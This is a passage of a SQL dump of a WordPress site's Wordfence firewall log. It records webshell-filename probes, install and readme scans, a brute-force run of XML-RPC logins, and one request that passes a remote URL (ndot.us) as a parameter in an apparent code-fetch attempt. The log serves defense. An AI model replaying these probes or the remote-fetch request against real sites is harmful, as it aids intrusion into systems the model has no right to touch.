(51057, 1712316530.641736, 1712316530.298700, '\0\0\0\0\0\0\0\0\0\0ÿÿõÍ`', 0, 403, 0, 0, 0, 'https://happythinking.com/rindex.php?parameter=RxRpcodx.php%7Chttp%3A%2F%2Fndot.us%2Fza&action=add', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3JpbmRleC5waHA=","category":"brute-force","ssl":1}'),
(50984, 1712208255.916675, 1712208255.442300, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ðD', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/wp-login.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWxvZ2luLnBocA==","category":"brute-force","ssl":1}'),
(51026, 0.000000, 1712300897.892747, '\0\0\0\0\0\0\0\0\0\0ÿÿÁÞ`', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51027, 1712302716.395383, 1712302716.019200, '\0\0\0\0\0\0\0\0\0\0ÿÿõÍ`', 0, 403, 0, 0, 0, 'https://happythinking.com/cjfuns.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2NqZnVucy5waHA=","category":"brute-force","ssl":1}'),
(51000, 1712208018.461649, 1712208018.058300, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ðD', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/ae.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2FlLnBocA==","category":"brute-force","ssl":1}'),
(51291, 0.000000, 1712319996.338025, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹ÿF*', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51292, 0.000000, 1712320003.828241, '\0\0\0\0\0\0\0\0\0\0ÿÿ·Wûö', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51293, 0.000000, 1712320003.943398, '\0\0\0\0\0\0\0\0\0\0ÿÿ¿7ì', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51294, 0.000000, 1712320004.782189, '\0\0\0\0\0\0\0\0\0\0ÿÿgÓ†{', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51050, 1712316545.821246, 1712316545.445300, '\0\0\0\0\0\0\0\0\0\0ÿÿõÍ`', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-content/plugins/core-stab/RxRdckne.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9jb3JlLXN0YWIvUnhSZGNrbmUucGhw","category":"brute-force","ssl":1}'),
(51279, 0.000000, 1712319941.562727, '\0\0\0\0\0\0\0\0\0\0ÿÿÈi8`', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51280, 0.000000, 1712319942.942804, '\0\0\0\0\0\0\0\0\0\0ÿÿ·S7‡', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51281, 0.000000, 1712319953.183557, '\0\0\0\0\0\0\0\0\0\0ÿÿij+', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51282, 0.000000, 1712319956.742045, '\0\0\0\0\0\0\0\0\0\0ÿÿz¤R}', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51283, 0.000000, 1712319959.745757, '\0\0\0\0\0\0\0\0\0\0ÿÿ-vÚ›', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51284, 0.000000, 1712319964.149049, '\0\0\0\0\0\0\0\0\0\0ÿÿÁÞ`', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51285, 0.000000, 1712319975.004070, '\0\0\0\0\0\0\0\0\0\0ÿÿ·±~@', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51286, 0.000000, 1712319976.884257, '\0\0\0\0\0\0\0\0\0\0ÿÿ1•	*', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51287, 0.000000, 1712319977.824392, '\0\0\0\0\0\0\0\0\0\0ÿÿ´ö";', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51288, 0.000000, 1712319985.180914, '\0\0\0\0\0\0\0\0\0\0ÿÿº¾±ˆ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51289, 0.000000, 1712319987.987877, '\0\0\0\0\0\0\0\0\0\0ÿÿ¾p''½', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51290, 0.000000, 1712319995.155073, '\0\0\0\0\0\0\0\0\0\0ÿÿ1$ð', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51863, 1712520733.315844, 1712520732.971800, '\0\0\0\0\0\0\0\0\0\0ÿÿÏöRê', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/essential-addons-for-elementor-lite/readme.txt', 'www.google.com', 'Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9lc3NlbnRpYWwtYWRkb25zLWZvci1lbGVtZW50b3ItbGl0ZS9yZWFkbWUudHh0","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9lc3NlbnRpYWwtYWRkb25zLWZvci1lbGVtZW50b3ItbGl0ZS9yZWFkbWUudHh0","category":"discovery-and-probing","ssl":1}'),
(51905, 1712636989.752119, 1712636989.366300, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/lufix.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2x1Zml4LnBocA==","category":"brute-force","ssl":1}'),
(51886, 1712582146.522383, 1712582145.968800, '\0\0\0\0\0\0\0\0\0\0ÿÿ€Çxî', 0, 403, 0, 0, 0, 'https://happythinking.com/cms/wp-admin/install.php', NULL, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 'blocked:waf', 'WordPress New Install File Probing', '{"learningMode":0,"failedRules":"506","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L2Ntcy93cC1hZG1pbi9pbnN0YWxsLnBocA==","path":"L2Ntcy93cC1hZG1pbi9pbnN0YWxsLnBocA==","category":"discovery-and-probing","ssl":1}'),
(51060, 0.000000, 1712318655.314302, '\0\0\0\0\0\0\0\0\0\0ÿÿ»,ÿŽ', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51061, 0.000000, 1712318691.534682, '\0\0\0\0\0\0\0\0\0\0ÿÿ°Í8Ë', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(50982, 1712208282.339804, 1712208281.937200, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ðD', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/configs.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2NvbmZpZ3MucGhw","category":"brute-force","ssl":1}'),
(51059, 0.000000, 1712318632.809355, '\0\0\0\0\0\0\0\0\0\0ÿÿVxá', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51058, 0.000000, 1712317844.812817, '\0\0\0\0\0\0\0\0\0\0ÿÿÁÞ`', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51346, 0.000000, 1712320253.523786, '\0\0\0\0\0\0\0\0\0\0ÿÿÈkZ\Z', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50981, 1712208291.080504, 1712208290.717000, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ðD', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/test.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3Rlc3QucGhw","category":"brute-force","ssl":1}'),
(50980, 1712208295.408790, 1712208294.946500, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ðD', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/classsmtps.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2NsYXNzc210cHMucGhw","category":"brute-force","ssl":1}'),
(51347, 0.000000, 1712320253.817727, '\0\0\0\0\0\0\0\0\0\0ÿÿxWX', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51348, 0.000000, 1712320255.529759, '\0\0\0\0\0\0\0\0\0\0ÿÿ{óR', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51349, 0.000000, 1712320257.849725, '\0\0\0\0\0\0\0\0\0\0ÿÿÉ``', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50979, 1712208311.805525, 1712208311.386100, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ðD', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/wp-hudbud.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWh1ZGJ1ZC5waHA=","category":"brute-force","ssl":1}'),
(51350, 0.000000, 1712320258.750968, '\0\0\0\0\0\0\0\0\0\0ÿÿÔí¹_', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51351, 0.000000, 1712320259.369762, '\0\0\0\0\0\0\0\0\0\0ÿÿj', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51352, 0.000000, 1712320265.190342, '\0\0\0\0\0\0\0\0\0\0ÿÿ_&”(', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL);
INSERT INTO `wpou_wfhits` VALUES
(50978, 1712208321.730996, 1712208321.331900, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ðD', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/inputs.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2lucHV0cy5waHA=","category":"brute-force","ssl":1}'),
(51353, 0.000000, 1712320273.665024, '\0\0\0\0\0\0\0\0\0\0ÿÿ…\Z.', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51354, 0.000000, 1712320278.529565, '\0\0\0\0\0\0\0\0\0\0ÿÿgjŠ­', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(50977, 1712208327.633130, 1712208327.271800, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ðD', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/autoload_classmap.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2F1dG9sb2FkX2NsYXNzbWFwLnBocA==","category":"brute-force","ssl":1}'),
(51355, 0.000000, 1712320278.640771, '\0\0\0\0\0\0\0\0\0\0ÿÿ‡Ù', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50976, 1712208338.570303, 1712208338.227100, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ðD', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/text.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3RleHQucGhw","category":"brute-force","ssl":1}'),
(51356, 0.000000, 1712320279.813542, '\0\0\0\0\0\0\0\0\0\0ÿÿÊŽ›j', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51357, 0.000000, 1712320282.825321, '\0\0\0\0\0\0\0\0\0\0ÿÿ1$Ñs', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51358, 0.000000, 1712320284.626980, '\0\0\0\0\0\0\0\0\0\0ÿÿÈQ{ ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(50975, 1712207402.917009, 1712207402.386500, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ðD', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/repeater.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3JlcGVhdGVyLnBocA==","category":"brute-force","ssl":1}'),
(51359, 0.000000, 1712320291.516014, '\0\0\0\0\0\0\0\0\0\0ÿÿ¼Sæ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51360, 0.000000, 1712320293.332338, '\0\0\0\0\0\0\0\0\0\0ÿÿg±ÑC', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51361, 0.000000, 1712320293.558257, '\0\0\0\0\0\0\0\0\0\0ÿÿ''$ã÷', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50974, 1712207422.994622, 1712207422.510500, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ðD', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/admin.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2FkbWluLnBocA==","category":"brute-force","ssl":1}'),
(51172, 0.000000, 1712319456.148220, '\0\0\0\0\0\0\0\0\0\0ÿÿ³?M', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
